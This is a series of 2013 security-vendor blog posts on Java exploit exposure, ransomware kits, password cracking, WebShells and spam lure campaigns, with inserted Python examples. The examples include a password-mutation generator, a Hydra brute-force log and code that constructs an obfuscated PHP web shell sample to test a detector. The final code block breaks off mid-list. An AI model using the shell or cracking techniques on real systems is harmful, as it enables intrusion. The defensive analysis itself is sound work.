Majority of Users Still Vulnerable to Java Exploits
Posted: 04 Jun 2013 05:00 AM

Over the last six weeks, Websense® Security Labs™ has been collecting telemetry from the Websense ThreatSeeker® Intelligence Cloud to measure uptake of the most recent version of Java. Following our March 2013 study of which Java versions are in use, we find that almost 93% of users are still not on the latest version. That leaves the majority of users exposed to exploit code already in use in the wild.


Since Oracle released the April 16 Java Critical Patch Update, we have also seen businesses slow to roll Java SE 7 Update 21 out into their environments. Based on our analysis, we identified the following trends:


  • 2 days after the release of the patch, less than 2% of users had adopted Java SE Version 7 Update 21.
  • After a full week, the average adoption of the newest version of Java was at less than 3%.
  • 2 weeks after the newest Java version was released, the trend line had moved to a little over 4%.
  • One month after release, the number of live web requests using the most recent version of Java was only around 7%.


So one month after release, the remaining 92.8% of users are still vulnerable to at least one exploit in the wild. Remember that the April 2013 Java Critical Patch Update contained 42 new security fixes, of which 39 may be remotely exploitable without authentication. To illustrate the danger of just one of those 39, on April 20, 2013 Metasploit published a module exploiting CVE-2013-2423, one of the vulnerabilities fixed in that update. We have since observed this exploit code incorporated into exploit kits and used in the wild. We are also monitoring the possible impact of a recent vulnerability disclosure affecting Java SE 7 Update 21 itself.


Our investigations further showed that the busiest period of patch adoption was the second week after release, and that adoption continues, though at a slower rate. As news of the available patch spreads (by word of mouth, or as the Java Auto Updater notifies users), some organizations become more willing to apply it.


Oracle is planning to release a Critical Patch Update for Java SE on June 18, 2013. Are you prepared for that?

If you are still in the 93% that have yet to apply the available patch, we, along with Oracle, strongly recommend that you consider applying it to your environment as soon as possible.


Acknowledgement: Thank you to Armin Buescher for his research.

Carl Leonard

iOS7 announcement prompts themed ransomware kits
Posted: 31 May 2013 02:15 PM

At Websense® Security Labs™ we recently spotted an interesting case of a phishing domain tied to the imminent release of Apple's iOS7 operating system.

As rumours about iOS7 circulate following Apple CEO Tim Cook's appearance at the D11 conference, cybercriminals are laying the groundwork for phishing and other malicious activity. The domain was registered about 22 days before this analysis, as our ThreatSeeker® Intelligence Cloud also records:


At first glance the host serves nothing but an open directory listing, in which we found some interesting binary files:


Browsing the listing, we opened the directory named "vl" and were immediately interested in what we found:


This is the control panel of the ransomware toolkit "Silence Locker", here in version 5, one of the latest releases of 2013. Silence Locker generates a malicious binary that displays law-enforcement imagery chosen to match the potential victim's country. In the page below, for example, a fake FBI Cyber Squad Investigation lock screen is bound to a binary that has been uploaded:


The other files hosted in the same directory are all detected by our ThreatSeeker Intelligence Cloud, as follows:


After a brief analysis of the binaries above, we noticed that they were packaged with AutoIT, in line with the current trend of wrapping malware to make detection harder. We continued by gathering telemetry on the IP address hosting this domain (ios7news.net). It appears the same IP address also serves other phishing domains, on the infrastructure below:


The domain hxxp://gamingdaily.us is most likely a phishing domain posing as a gaming news site, and it also hosts the BleedingLife exploit kit. Here are some details:


In the first row it is easy to spot the URL parameters that deliver a malicious PDF exploiting CVE-2010-0188, an Adobe Reader TIFF-parsing flaw and one of the most frequently used PDF vulnerabilities in exploit kits.

Other vulnerabilities used by this exploit kit can be identified just by looking at the content:


The two red boxes show the JavaScript that picks the exploit best suited to the victim's browser and plugin configuration. The list of CVEs used by this exploit kit is reported here. Both IT news and rumours about worldwide events can be used by attackers to play on people's curiosity, as was done here. Given details such as the open directory listing, we can suppose that the attackers were still setting up this domain for ransomware-based activity.


Gianluca Giuliani

Twitter Adopt 2FA; Here Is What You Can Do
Posted: 23 May 2013 09:01 AM

In the wake of recent account compromises, including that of the Associated Press and the string of breaches orchestrated by the "Syrian Electronic Army", Twitter has released 2FA (two-factor authentication), a most welcome addition that bolsters users' security. It is not, however, the be-all and end-all: users are still responsible for choosing strong, hard-to-guess passwords. If your password is compromised, control of your account may be lost to malicious actors.


While it is true that, given enough time and resources, any password can be brute-forced regardless of its complexity, the purpose of a long, random pass-string is to make the attack infeasible in practice: every extra character multiplies the search space by the size of the character set. Let's first look at the total number of possible combinations for a given character set and length:


The table allows characters to repeat and treats order as significant: each entry is the size of the character set raised to the power of the length.


The first row, 26^8 (about 2.1 × 10^11) combinations of eight lowercase letters, covers every lowercase English word of up to eight characters. That may seem an unattainable number of combinations, but with modern GPUs (Graphics Processing Units) able to compute a fast, unsalted hash at up to 772 MH/s (772 million hashes per second), the first row would be exhausted in around 270 seconds, or about 4.5 minutes. The rate depends heavily on the hash algorithm: deliberately slow hashes such as bcrypt run orders of magnitude slower.


A user is unlikely to choose eight arbitrary characters for a password used daily; a typical string has some semantic content, such as a dictionary word and its mutations. Knowing this, crackers have produced many aids for this kind of attack, including dictionary files and rainbow tables (pre-computed chains of hashes that trade storage for cracking time; they work only against unsalted hashes, which is one reason salting matters).


To give an idea of how quickly weak passwords fall, we set up a test using a simple Python script to generate candidates and THC Hydra (as shipped with BackTrack 5) to try them against a test SMTP account. Note that this is an online attack: every guess is a login attempt against the server, so the rate is bounded by the server and the network rather than by cracking hardware:


Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-23 07:08:12
...
login: ******   password: dave123
[VERBOSE] using SMTP LOGIN AUTH mechanism
1 of 1 target successfully completed, 1 valid password found
Hydra finished at 2013-05-23 07:08:51
<finished>


The password drew on only 36 possible characters (lower-case a-z and 0-9) and was found in 39 seconds.


While major sites will have (or should have) throttling of authentication attempts, it is not uncommon for minor sites to allow unlimited attempts against an account, which, coupled with password reuse, is a huge problem.


Users I have spoken to told me they use different passwords for different sites in almost all cases. When quizzed further, I found they typically used the same base string with some simple mutations, for example:


password
Password
Passw0rd
passw0rd!1
pa$5w0rd!1


Knowing the base string, and with a very simple substitution algorithm (leet-speak digits, symbols and so on), these accounts can be cracked in seconds. It is trivial for an attacker to automate this, so credentials harvested from some forgotten, compromised server lead directly to attacks on accounts elsewhere that share the same user name.
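The mutation pattern above is mechanical enough to automate in a few lines. The block below is an added example, not the author's script, that generates the leet-speak, case and suffix variants of a base string, and shows the defensive counterpart: normalising a candidate back to its base word so that a password change from Passw0rd to pa$5w0rd!1 can be refused as a trivial mutation. The substitution table and suffix list are assumptions chosen to cover the five examples above, not an exhaustive cracking rule set.

```python
"""Added example: generate the simple mutations of a base password, and detect them."""
import itertools
import re

# Substitutions users (and cracking rule sets) typically apply: letter -> its leet alternatives.
LEET = {"a": "@4", "e": "3", "i": "1!", "o": "0", "s": "$5", "t": "7"}
# Reverse map used when normalising a candidate back to its base word.
UNLEET = {"@": "a", "4": "a", "3": "e", "1": "i", "!": "i", "0": "o", "$": "s", "5": "s", "7": "t"}
# Assumed suffix list; real rule sets are far longer.
SUFFIXES = ("", "1", "!", "!1", "123", "2013")


def mutations(base):
    """All candidates an attacker would try given the base string: leet swaps x case x suffixes.

    The candidate count is the product of the per-character options, so this is only
    practical for the short base words people actually use.
    """
    base = base.lower()
    per_char = [ch + LEET.get(ch, "") for ch in base]   # e.g. 's' -> 's$5': keep it, or swap it
    out = set()
    for combo in itertools.product(*per_char):
        core = "".join(combo)
        for variant in (core, core.capitalize(), core.upper()):
            for suffix in SUFFIXES:
                out.add(variant + suffix)
    return out


def normalise(password):
    """Strip leading/trailing digits and symbols, undo leet swaps, lower-case.

    'pa$5w0rd!1' -> 'password'. Deliberately lossy: '1' and '!' both collapse to 'i'.
    """
    core = re.sub(r"^[^A-Za-z]+|[^A-Za-z]+$", "", password)
    return "".join(UNLEET.get(ch, ch) for ch in core.lower())


def is_simple_mutation(old, new):
    """True when 'new' is just 'old' with case changes, leet swaps or a digit/symbol prefix/suffix."""
    return normalise(old) == normalise(new)


if __name__ == "__main__":
    candidates = mutations("password")
    print(len(candidates), "candidates for base 'password'")
    for pw in ("password", "Password", "Passw0rd", "passw0rd!1", "pa$5w0rd!1"):
        print(f"{pw:12} generated={pw in candidates}  mutation_of_password={is_simple_mutation('password', pw)}")
```

Used as a password-change check, normalise() would also reject summer2012 to Summer2013!, the other classic rotation. It does not catch reversals, insertions in the middle of the word or a switch to a different dictionary word, which is why the real answer is a unique, randomly generated password per site rather than a cleverer mutation.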


As Twitter will attest, secure, hard-to-guess pass-strings and varied user names (not always possible) are a must for anyone using systems, applications or sites accessible to others. Remember, it is not just strangers on the internet who are after your credentials; rogue employees and disgruntled exes, to name but two, are also on the lookout for your details.


To ensure accounts are as secure as possible, it’s advisable to:

  1. Use strong, hard to guess, non-dictionary pass-strings. If the app doesn't allow you to use a mix of alphanumeric and special characters, you may not want the owner to have your details.
  2. Never, ever reuse passwords. It’s also good practice to not reuse passwords with simple substitutions.
  3. Ensure old accounts are deactivated where possible. Although you cannot trust a database would be purged of credentials, it’s certainly a start.
  4. Think before signing up to a site or service; always read their security policy.
  5. Be vigilant! Phishing is an easy-win for cyber criminals, so don’t give them an easy ride – sites and services will (or should) _never_ ask for your password via email.


Abiding by these rules will help make passwords as secure as they can be.

Drendell_

Internet Explorer Zero-day Vulnerability (CVE-2013-1347) [Updated]
Posted: 07 May 2013 03:26 PM

A new vulnerability in Microsoft Internet Explorer affects version 8. It allows attackers to execute code on a machine simply by having the user visit a malicious website, for example after the user is tricked into clicking a link in an email, or via a compromised legitimate website such as the recently compromised Department of Labor site, which was used in a watering hole attack. Microsoft has confirmed that the malicious payloads delivered from that compromise exploit the new vulnerability, designated CVE-2013-1347.


The vulnerability is a use-after-free: Internet Explorer accesses an object that has been deleted or not properly allocated. A Metasploit module is now available, meaning working exploit code is public, and we anticipate seeing this vulnerability used in broader attacks soon.


More information about the vulnerability can be found in Microsoft Advisory 2847140.


How Does Websense Protect You?

Websense customers are protected with ACE™, our Advanced Classification Engine.


ACE protects against all known samples (at the URL level and with real-time analytics). We have also examined the Metasploit module and added protection for it and any subsequent variations.


If we correlate this attack to the 7 Stages of Advanced Threats (as explained in our whitepaper), we currently have protection for:

  • Stage 2 (Lure) - the website involved in the watering hole attack
  • Stage 3 (Redirect) - the websites that take the user to the delivery of the exploit code
  • Stage 4 (Exploit Kit) - we have real-time detection of the exploit code
  • Stage 6 (Call Home) - we offer protection from the websites used as a Command & Control
  • Should the attack succeed, our customers would be protected from Stage 7 (Data Theft) through our data loss prevention tools.


As a member of the Microsoft Active Protection Program (MAPP), we are also working with Microsoft to monitor this situation.


[Update]

Thursday, May 9, 2013:

Microsoft has released a "Fix it" solution for CVE-2013-1347. Keep in mind that a Fix it is a temporary mitigation, not a replacement for the full security update, which should be applied as soon as it is available.


Carl Leonard

WebShells WebShells on the Web Server
Posted: 03 May 2013 01:45 AM

This post briefly describes what WebShells are and how attackers use them to gain shell-level access to a server. WebShells have been used in attacks for a long time, but as attack trends change, criminals are becoming more sophisticated in how they deploy them and in how they evade detection. With the help of our Websense® ThreatSeeker® Intelligence Cloud we came across a few examples of attackers using different techniques, elaborated on below.


Many mass compromises are automated: vulnerabilities are enumerated, and once one is found exploits are deployed automatically. The takeover usually involves dropping a remote administration tool onto the compromised website, and one common tool deployed by attackers at that point is a WebShell.


The diagram above shows an attack in which the attacker finds a vulnerability in a hosted web application and manages to upload a backdoor written in one of the languages the server supports. This gives the attacker control of the web server, with the privileges of the web server process.


What is a WebShell?

A WebShell is a script (written in a server-side language such as PHP, Perl or Python) that runs on the web server and lets its operator administer the machine remotely. Although scripts of this kind are used as remote administration tools for legitimate reasons, they are routinely abused by attackers once a website has been compromised. Once the web server executes the script, the attacker gains shell-level access to the host operating system with the same privileges as the web server. To avoid detection by firewalls or antivirus, attackers usually employ evasion techniques such as code obfuscation and encryption. Full content inspection can reveal and intercept a wide variety of common obfuscation techniques, and even decode the script to expose its real intent. Let's look at an example.


In the following example we see a custom WebShell called "oRb". The body of the shell is obfuscated to avoid detection: it is passed through preg_replace() with the "e" modifier, which makes PHP evaluate the replacement string as code, and the replacement itself is hex-encoded to conceal the call to eval(gzinflate(base64_decode(...))).


The URL that serves the WebShell further tries to mislead security tools by declaring in the HTTP response header that the content type is an image, as you can see below:


With its real-time scanning capability, Websense ACE™ (our Advanced Classification Engine) detects the obfuscation methods and techniques discussed above.
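What the "full content inspection" described above looks like in code: the block below is an added example, not ACE or any Websense code, that decodes PHP hex escapes, flags the preg_replace /e modifier and the eval(gzinflate(base64_decode( chain, checks the declared Content-Type against the body, and peels the base64 + gzinflate layer to expose the inner shell. The response it inspects is constructed inside the code to match the oRb description (an image Content-Type carrying a hex-obfuscated PHP body); it is not the captured file, and the inner one-line shell is likewise made up.

```python
"""Added example: inspect a PHP response for the WebShell obfuscation tricks described above."""
import base64
import re
import zlib

# eval(gzinflate(base64_decode(...))) and close relatives, matched after escapes are decoded.
EVAL_CHAIN_RE = re.compile(
    r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)\s*\(\s*base64_decode\s*\(", re.I)
# preg_replace("/pattern/e", ...): the e modifier runs the replacement string as PHP code.
PREG_E_RE = re.compile(
    r"""preg_replace\s*\(\s*["'](?P<d>[^\w\s\\])(?P<pat>.*?)(?P=d)(?P<mods>[A-Za-z]*)["']""", re.S)
B64_ARG_RE = re.compile(r"""base64_decode\s*\(\s*["']([A-Za-z0-9+/=]+)["']""")


def decode_php_escapes(text):
    """Resolve \\xHH and \\NNN escapes of PHP double-quoted strings and join "ev"."al" concatenations."""
    text = re.sub(r"\\x([0-9A-Fa-f]{1,2})", lambda m: chr(int(m.group(1), 16)), text)
    text = re.sub(r"\\([0-7]{1,3})", lambda m: chr(int(m.group(1), 8)), text)
    return re.sub(r"""["']\s*\.\s*["']""", "", text)


def unwrap_gzinflate_base64(text):
    """Peel one base64 + raw-DEFLATE layer (what PHP's gzinflate(base64_decode()) undoes); None if absent."""
    m = B64_ARG_RE.search(text)
    if not m:
        return None
    try:
        return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("utf-8", "replace")
    except (ValueError, zlib.error):
        return None


def inspect_response(headers, body):
    """Findings for one HTTP response: header/body mismatch, /e modifier, hidden eval chain, inner payload."""
    findings = []
    decoded = decode_php_escapes(body)
    if headers.get("Content-Type", "").lower().startswith("image/") and "<?php" in decoded:
        findings.append("content-type-mismatch")        # claims to be an image, carries PHP source
    if any("e" in m.group("mods") for m in PREG_E_RE.finditer(decoded)):
        findings.append("preg_replace-e-modifier")
    if EVAL_CHAIN_RE.search(decoded):
        findings.append("eval-gzinflate-base64-chain")
    payload = unwrap_gzinflate_base64(decoded)
    if payload is not None:
        findings.append("decoded-payload")
    return {"findings": findings, "payload": payload}


def hex_escape(text):
    """Hide a keyword the way oRb does: 'eval' -> '\\x65\\x76\\x61\\x6c'."""
    return "".join(f"\\x{ord(c):02x}" for c in text)


def build_sample():
    """Constructed sample, not a real capture: an 'image' whose body is a hex-obfuscated PHP shell."""
    inner = "<?php if (isset($_POST['cmd'])) { system($_POST['cmd']); } ?>"
    deflater = zlib.compressobj(9, zlib.DEFLATED, -15)           # raw DEFLATE, as gzinflate() expects
    blob = base64.b64encode(deflater.compress(inner.encode()) + deflater.flush()).decode()
    replacement = hex_escape("eval(gzinflate(base64_decode(") + "'" + blob + "'" + hex_escape(")))")
    body = '<?php\npreg_replace("' + hex_escape("/.*/e") + '", "' + replacement + '", "");\n'
    return {"Content-Type": "image/gif", "Server": "Apache"}, body


if __name__ == "__main__":
    hdrs, php = build_sample()
    result = inspect_response(hdrs, php)
    print(result["findings"])
    print(result["payload"])
```

The inspector only resolves escapes in literal string arguments; a shell that assembles its pattern in a variable, or via chr() concatenation, needs that indirection resolved first. Note also that the /e modifier was deprecated in PHP 5.5 and removed in PHP 7, so its presence in code on a current server is a red flag in itself.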


Let's now look at a second example to see the kind of functionality WebShells offer. Here we see a non-obfuscated copy of "RC Shell v2.0", which, like the previous example, also tries to pass itself off as an image:


A working WebShell

Once the WebShell script is run, it provides a web interface for remote operations on the server, including, but not limited to:


  • Server Information
  • File manager (access to file system)
  • Access to execute commands
  • SQL manager
  • PHP code execution
  • Bruteforce FTP, MySQL, PgSQL
  • Search files, search text in files
  • Malicious content upload
  • Mass code injection 


This animated image shows how it would look when run (click the image to open; the animation loops):

Websense ThreatSeeker Intelligence Cloud processes approximately 5 billion web requests per day. Among those requests, just yesterday, we found 1,400 unique WebShell threats across different countries. Here is an example of how one obfuscated WebShell is spread around the globe:


How does Websense protect against WebShells?

The animated graphic above shows how powerful the access can be for an attacker.


ACE blocks access to a malicious WebShell script or page should your end users reach one. Beyond that, we monitor outbound content to stop sensitive data leaving the organization via shell commands, even when the abused channel is SSL-encrypted, which is a common advanced-malware technique. Our web telemetry covers more than 85,000,000 compromised websites, which lets us learn from them, including what we have discussed here about WebShells. Have a read of our Threat Report to find out more.


Samana

Cyber Criminals Exploiting the Boston Marathon Aftermath [UPDATED]
Posted: 17 Apr 2013 12:32 PM

While the world recoils in shock at the horrifying events at Monday's Boston Marathon, cybercriminals are actively seeking to exploit people's thirst for information and eagerness to help those affected by the attacks.

The Websense ThreatSeeker® Intelligence Cloud is currently detecting and blocking multiple email-borne campaigns that attempt to lure unsuspecting recipients to malicious websites in order to exploit their machines for criminal gains.

Let's follow this campaign through the 7 Stages of Advanced Threats (as explained in our whitepaper) to see how cyber-criminals attempt to dupe and compromise users and their machines. We'll also show that breaking any one link in the chain can protect potential victims.


Stage 1: Reconnaissance

This campaign, like many other topical or event-based campaigns, attempts to propagate as widely as possible, rather than being directed at specific individuals or organizations. Given this, those behind the nefarious campaign simply have to identify a news story with global appeal (in this case, Monday's events), and then propagate their lure to as many people as possible.


Stage 2: Lure

Preying on human curiosity, in particular after a significant event, the lure is designed to get as many victims onto the hook as possible. In the email campaigns being monitored by Websense® Security Labs™, the email subjects have been designed to suggest that the message contains information or news regarding the events:

  • 2 Explosions at Boston Marathon
  • Aftermath to explosion at Boston Marathon
  • Boston Explosion Caught on Video
  • BREAKING - Boston Marathon Explosion
  • Explosion at the Boston Marathon
  • Explosions at Boston Marathon
  • Explosions at the Boston Marathon
  • Runner captures. Marathon Explosion
  • Video of Explosion at the Boston Marathon

The message body itself, in most cases, contains a single URL of the form http://<IP Address>/news.html or http://<IP Address>/boston.html, with no further detail or information. At this point the recipient is lured into clicking the malicious link, which ushers them on to stage 3.
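A mail filter can key on exactly the shape described above: a topical subject, a body that is nothing but a URL, an IP-literal host and one of the campaign's paths. The block below is an added example, not Websense's detection logic, that scores a message on those signals; it also accepts the texas.html path the update further down describes, and the "Re: Fwd:"-without-a-thread pattern of the Blackhole campaign later on this page. The sample messages and their TEST-NET addresses are constructed, and the block/suspicious thresholds are illustrative.

```python
"""Added example: flag lure emails of the shape described above (topical subject, bare IP-literal URL)."""
import re
from ipaddress import ip_address

# Terms taken from the subject lines quoted above, plus the Texas variant the campaign moved on to.
TOPICAL_TERMS = ("boston", "marathon", "explosion", "texas", "waco", "fertilizer")
# Paths seen in the campaign: news.html, boston.html and later texas.html.
LURE_PATHS = {"news.html", "boston.html", "texas.html"}
URL_RE = re.compile(r"(https?)://([^/\s]+)(/\S*)?", re.I)


def is_ip_literal(host):
    """True for hosts such as 192.0.2.10 (or a bracketed IPv6 literal); real news sites use names."""
    try:
        ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def classify_lure(headers, body):
    """Score one message; returns a verdict, the reasons behind it, and URLs worth blocking."""
    reasons, indicators = set(), []
    subject = headers.get("Subject", "").lower()
    if any(term in subject for term in TOPICAL_TERMS):
        reasons.add("topical-subject")
    # A "Re:"/"Fwd:" subject on a message that belongs to no thread is a weak signal on its own.
    if re.match(r"^\s*(re|fwd?)\s*:", subject) and not (headers.get("In-Reply-To") or headers.get("References")):
        reasons.add("unthreaded-reply")
    if URL_RE.fullmatch(body.strip()):
        reasons.add("body-is-bare-url")               # nothing but a link, no text at all
    for scheme, host, path in URL_RE.findall(body):
        path = path or ""
        if is_ip_literal(host):
            reasons.add("ip-literal-host")
            indicators.append(f"{scheme.lower()}://{host}{path}")
        if path.lstrip("/").lower() in LURE_PATHS:
            reasons.add("known-lure-path")
    verdict = "block" if len(reasons) >= 3 else "suspicious" if reasons else "clean"
    return {"verdict": verdict, "reasons": sorted(reasons), "indicators": indicators}


# Constructed sample messages (TEST-NET addresses, not the campaign's real hosts).
SAMPLE_MESSAGES = [
    ({"Subject": "Boston Explosion Caught on Video"}, "http://192.0.2.10/boston.html"),
    ({"Subject": "Texas Plant Explosion"}, "http://198.51.100.7/texas.html\n"),
    ({"Subject": "Re: Fwd: Kissinger: Thatcher's strong beliefs"}, "Read this: http://203.0.113.44/news.php"),
    ({"Subject": "Q2 budget review", "In-Reply-To": "<abc@example.com>"},
     "Slides at https://intranet.example.com/finance/q2.html, see you at 3."),
]

if __name__ == "__main__":
    for hdrs, body in SAMPLE_MESSAGES:
        result = classify_lure(hdrs, body)
        print(f"{result['verdict']:10} {hdrs['Subject']!r} {result['reasons']} {result['indicators']}")
```

The indicators list is what you would feed a web proxy blocklist: blocking the IP-literal destinations breaks the chain at stage 3 even for recipients who do click, which is the point made below about breaking any one link.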


Stage 3: Redirect

Having clicked the link, the unwitting victim is presented with a page containing YouTube videos of the horrific events (intentionally obscured below) while an iframe redirects them to an exploit page.


Stage 4 - Exploit Kit

Based on analysis of a sample of the malicious URLs seen so far in this campaign, the RedKit exploit kit was used, in our case exploiting an Oracle Java 7 Security Manager bypass (CVE-2013-0422) to deliver a file onto our analysis machine.


Stage 5 - Dropper File

Rather than a dropper (a file that carries the malicious payload inside itself, often packed to evade antivirus signatures), this campaign uses a downloader from the Win32/Waledac family to fetch further malicious binaries. In this case two bots, Win32/Kelihos and Troj/Zbot, are downloaded and installed to enrol the compromised machine in the criminals' botnet.


Stage 6 - Call Home / Stage 7 - Data Theft

Once the compromised machine is under the control of the cyber-criminal, the bots call home, which allows remote commands to be issued and for data to be sent and received. Common abuses of a compromised machine include data collection and exfiltration, such as the theft of financial and personal information. Other abuses include the sending of unsolicited email or the unwilling participation in Distributed Denial of Service attacks.


Websense customers are protected by ACE™, our Advanced Classification Engine, against cyber threats of this nature. In addition to blocking lures at stage 2 before they reach end users, access to malicious destinations throughout stages 3 to 6 is denied, which, combined with data loss controls against stage 7, helps ensure that your data stays where it belongs and not in the hands of an attacker.


Our thoughts are with the victims and their families at this time. While these cyber abuses are minor by comparison, users can help protect themselves by sourcing the news directly from reputable news agencies. Should you want to donate (be that blood to local hospitals or money to assisting organizations), be sure to visit official websites rather than following links that appear in your mailbox.


[Update]


Thursday, April 18, 2013:

The campaign quickly evolved to match the latest news from the Texas fertilizer plant explosion.

The emails are similar, but use the texas.html path instead of boston.html.


Subject lines include:


  • Texas Plant Explosion
  • Raw: Texas Explosion Injures Dozens
  • Texas Explosion Injures Dozens
  • CAUGHT ON CAMERA: Fertilizer Plant Explosion
  • Waco Explosion HD
  • Video footage of Texas explosion
  • Plant Explosion Near Waco, Texas
  • West Tx Explosion


The lure pages have updated titles, but the rest is similar:


Websense Security Labs will continue to monitor this campaign.

DNS Poisoning Hits Kenya Google, MSN, Skype...
Posted: 15 Apr 2013 08:14 AM

The Websense® ThreatSeeker® Intelligence Cloud has detected a DNS poisoning attack under way in Kenya, targeting the local sites of big-name technology brands including Google, Bing and LinkedIn. For now the DNS records point to a page on which the attackers announce the hack, but they could just as easily be pointed at a malicious page.


Below is the snapshot in Websense ThreatSeeker Intelligence Cloud:


This is another attack by the so-called Bangladeshi Hacker Group, which has defaced 700,000 websites in the past and recently targeted prominent sites in Malawi (February 2013). For the Kenya campaign we cross-referenced zone-h.com (a site that tracks defaced websites) and confirmed that the following well-known sites were affected:



Websense customers are protected by our Advanced Classification Engine with real-time detection intelligence.


uwang

Margaret Thatcher's Death Used in Cyber Attacks
Posted: 10 Apr 2013 03:39 AM

As the world remembers former British Prime Minister Margaret Thatcher, cyber attackers are joining in, in their own underhand way. Websense® Security Labs™ and the Websense ThreatSeeker® Intelligence Cloud have detected attackers sending malicious spam with subjects referencing Mrs. Thatcher's death. It is nothing new for attackers to ride a hot topic (like the death of Hugo Chavez) to spread malware. In this case the lure email is very simple, just a few words relating to Mrs. Thatcher, but it pretends to come from a friend by carrying a "Re: Fwd:" subject prefix. Internet-savvy users will recognise it as suspicious and should not be tempted to click the link in the email.


When recipients click the malicious link they are taken first to a redirection page and then to a Blackhole Exploit Kit landing page. The landing page fingerprints the browser and its plugins and serves an exploit file chosen to match. The final payload is a Cridex trojan, as seen in our ThreatScope™ report and in the VirusTotal report here. Cridex is known for breaking CAPTCHA codes; you can see this trojan in action in our previous blog here.


Server-side polymorphism has been applied to evade traditional AV detection.


This is not the first Blackhole malicious email campaign we have seen; it has evolved over time alongside hot topics such as the current crisis in Korea or major companies filing for bankruptcy. Please be careful with any email carrying one of the following subjects:


  • Fwd: Dollar Bank bankruptcy
  • Re: Shedding light on 'dark matter'
  • Re: Why Washington is corrupt
  • Re: Kissinger: Thatcher's strong beliefs
  • Re: Tax havens busted
  • Fwd: Re: First Citizens Bank bankruptcy
  • Fwd: Re: Living large in Don Draper's New York
  • Fwd: Re: Kissinger: Thatcher's strong beliefs
  • Re: Fwd: California Bank & Trust bankruptcy
  • Fwd: Re: Bank of America bankruptcy
  • Fwd: Allowing knives on planes is 'insane'
  • Fwd: Re: War with N. Korea
  • Fwd: Air Canada goes 'Gangnam style'
  • Fwd: Re: NASA plans to catch an asteroid
  • Re: Fwd: Dollar Bank bankruptcy
  • Fwd: Why Washington is corrupt
  • Fwd: Blast kills 29 on bus in New-York
  • Fwd: Shedding light on 'dark matter'
  • Fwd: Re: Marikana massacre aftermath
  • Re: Fwd: Kissinger: Thatcher's strong beliefs
  • Fwd: Re: PNC Bank bankruptcy
  • Re: Fwd: Bank Of The West bankruptcy
  • Re: Fwd: M&I Bank bankruptcy
  • Re: Bank Of The West bankruptcy
  • Fwd: Bank Of The West bankruptcy
  • Re: Fwd: PNC Bank bankruptcy
  • Re: Bank of America bankruptcy
  • Re: Fwd: War with N. Korea
  • Re: California Bank & Trust bankruptcy
  • Re: Blast kills 29 on bus in New-York
  • Re: Fwd: Blast kills 29 on bus in New-York
  • Re: Sending out SOS for 'America's flagship'
  • Re: Fwd: Marikana massacre aftermath
  • Re: Living large in Don Draper's New York
  • Re: War with N. Korea
  • Fwd: Re: Death penalty 'harms Bali's reputation'
  • Re: Fwd: Death penalty 'harms Bali's reputation'
  • Re: PNC Bank bankruptcy
  • Re: NASA plans to catch an asteroid
  • Re: Northern Trust Bank bankruptcy
  • Fwd: Tax havens busted
  • Re: Fwd: Why Washington is corrupt
  • Re: Fwd: Tax havens busted
  • Fwd: M&I Bank bankruptcy
  • Re: Fwd: Fashion designer Lilly Pulitzer dies
  • Re: First Citizens Bank bankruptcy
  • Re: Fwd: Shedding light on 'dark matter'
  • Re: Fwd: Living large in Don Draper's New York
  • Re: Fwd: Northern Trust Bank bankruptcy
  • Fwd: Re: California Bank & Trust bankruptcy
  • Re: Air Canada goes 'Gangnam style'
  • Re: Fashion designer Lilly Pulitzer dies
  • Re: Dollar Bank bankruptcy
  • Fwd: Sending out SOS for 'America's flagship'

Websense technologies can protect customers in a multi-stage attack:

  • Websense email security blocks the malicious email.
  • Our Advanced Classification Engine (ACE™) detects the malicious content both in redirection and in the exploit page with real-time intelligence.
  • Exploit files and the payload trojan are detected by Websense Gateway products.
  • Websense technologies can identify malicious droppers both statically and behaviorally (via Websense ThreatScope).


How are Java attacks getting through?
Posted: 25 Mar 2013 09:01 PM

Were you aware that Java is increasingly being viewed as a security risk? Of course you were: recent high-profile attacks have firmly established the trend, so we're not going to do yet another roundup here.


Instead, let's drill in and try to understand the core problem. With so many vulnerabilities it is hard to keep browsers up to date with the latest patched versions, especially because Java is updated independently of the browser. How hard is it? We decided to check.


We recently added Java version detection to our Advanced Classification Engine (ACE™) and pumped it into the Websense ThreatSeeker® Intelligence Cloud to get real-time telemetry about which versions of Java are actively being used across tens of millions of endpoints. Here's what we found (you may need to click on the graph to see all the detail):


Figure 1: Global distribution of Java Runtime Environment versions based on active browser usage


As you can see, Java versions are all over the map. At the time of writing the latest Java Runtime Environment is Java 7 Update 17 (java.version 1.7.0_17, written 1.7.17 here), but only about five percent of the overall mix are using it. Most versions are months or even years out of date. How does this translate into the attack space?


Exploit kits are a very common distribution tool for Java-based threats. From the billions of daily web requests classified through our network, here is the breakdown of active browser requests that are exploitable by each vulnerability, and of the exploit kits that have incorporated attacks for it.


Java Vulnerability   Vulnerable Versions**   Browsers Vulnerable   Exploit Kits With Live Exploits
CVE-2013-1493        1.7.15, 1.6.41          93.77%                Cool
CVE-2013-0431        1.7.11, 1.6.38          83.87%                Cool
CVE-2012-5076        1.7.07, 1.6.35          74.06%                Cool, Gong Da, MiniDuke
CVE-2012-4681        1.7.06, 1.6.34          71.54%                Blackhole 2.0, RedKit, CritXPack, Gong Da
CVE-2012-1723        1.7.04, 1.6.32          67.72%                Blackhole 2.0, RedKit, CritXPack, Gong Da
CVE-2012-0507        1.7.02, 1.6.30          59.51%                Cool, Blackhole 2.0, RedKit, CritXPack, Gong Da

** All prior JRE versions below those listed are also vulnerable. Versions are written in short form: 1.7.15 is JRE 7 Update 15 (java.version 1.7.0_15).
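Putting the table to work: the block below is an added example, written for this edit rather than taken from the post or from Websense, that maps observed JRE versions to the rows above. It accepts both the java.version form (1.7.0_17) and the shorthand used in the table (1.7.17), applies the footnote's rule that every update older than the one listed is also exposed, and computes the exposed share of a set of requests, which is how the percentages in the table are read. The User-Agent handling assumes the "Java/1.x.0_NN" token that the Java plugin puts in its requests; the sample User-Agent strings are constructed, not telemetry.

```python
"""Added example: map observed JRE versions to the vulnerabilities in the table above."""
import re
from collections import Counter

# (CVE, last vulnerable update on the JRE 7 line, last vulnerable update on the JRE 6 line),
# transcribed from the table above; the footnote says every older update is vulnerable too.
VULN_TABLE = [
    ("CVE-2013-1493", 15, 41),
    ("CVE-2013-0431", 11, 38),
    ("CVE-2012-5076", 7, 35),
    ("CVE-2012-4681", 6, 34),
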